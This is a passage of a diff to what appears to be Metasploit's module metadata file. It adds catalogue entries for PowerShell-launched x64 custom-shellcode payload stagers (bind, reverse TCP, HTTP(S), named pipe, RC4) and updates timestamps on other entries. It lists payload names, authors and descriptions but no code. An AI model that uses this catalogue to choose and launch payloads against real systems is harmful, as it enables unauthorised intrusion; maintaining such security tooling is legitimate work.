    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_uuid",
@@ -177714,7 +180934,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_winhttp",
@@ -177726,6 +180946,525 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_ipv6_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/bind_named_pipe": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind Named Pipe Stager",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "UserExistsError"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a pipe connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/bind_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Bind TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/bind_tcp_rc4": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "max3raza",
+      "RageLtMan"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/bind_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_http": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_https": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "agix",
+      "rwincey"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_named_pipe": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_tcp_rc4": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "max3raza",
+      "RageLtMan"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_winhttp": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/x64/custom/reverse_winhttps": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)",
+    "fullname": "payload/cmd/windows/powershell/x64/custom/reverse_winhttps",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/custom/reverse_winhttps",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "payload_cmd/windows/powershell/x64/encrypted_shell/reverse_tcp": {
    "name": "Powershell Exec, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/powershell/x64/encrypted_shell/reverse_tcp",
@@ -177750,7 +181489,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/encrypted_shell/reverse_tcp",
@@ -177785,7 +181524,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/exec",
@@ -177821,7 +181560,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/loadlibrary",
@@ -177856,7 +181595,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/messagebox",
@@ -177894,7 +181633,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp",
@@ -177932,7 +181671,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid",
@@ -177971,7 +181710,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_named_pipe",
@@ -178009,7 +181748,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp",
@@ -178051,7 +181790,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4",
@@ -178089,7 +181828,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid",
@@ -178127,7 +181866,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_http",
@@ -178168,7 +181907,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_https",
@@ -178206,7 +181945,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_named_pipe",
@@ -178244,7 +181983,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp",
@@ -178286,7 +182025,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4",
@@ -178324,7 +182063,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid",
@@ -178362,7 +182101,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttp",
@@ -178400,7 +182139,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttps",
@@ -178436,7 +182175,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp",
@@ -178473,7 +182212,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid",
@@ -178509,7 +182248,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_named_pipe",
@@ -178545,7 +182284,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp",
@@ -178586,7 +182325,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_rc4",
@@ -178623,7 +182362,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_uuid",
@@ -178659,7 +182398,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_named_pipe",
@@ -178695,7 +182434,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp",
@@ -178736,7 +182475,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_rc4",
@@ -178773,7 +182512,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_uuid",
@@ -178808,7 +182547,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/pingback_reverse_tcp",
@@ -178845,7 +182584,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/powershell_bind_tcp",
@@ -178882,7 +182621,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp",
@@ -178919,7 +182658,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp_ssl",
@@ -178954,7 +182693,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp",
@@ -178990,7 +182729,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid",
@@ -179026,7 +182765,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_named_pipe",
@@ -179061,7 +182800,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
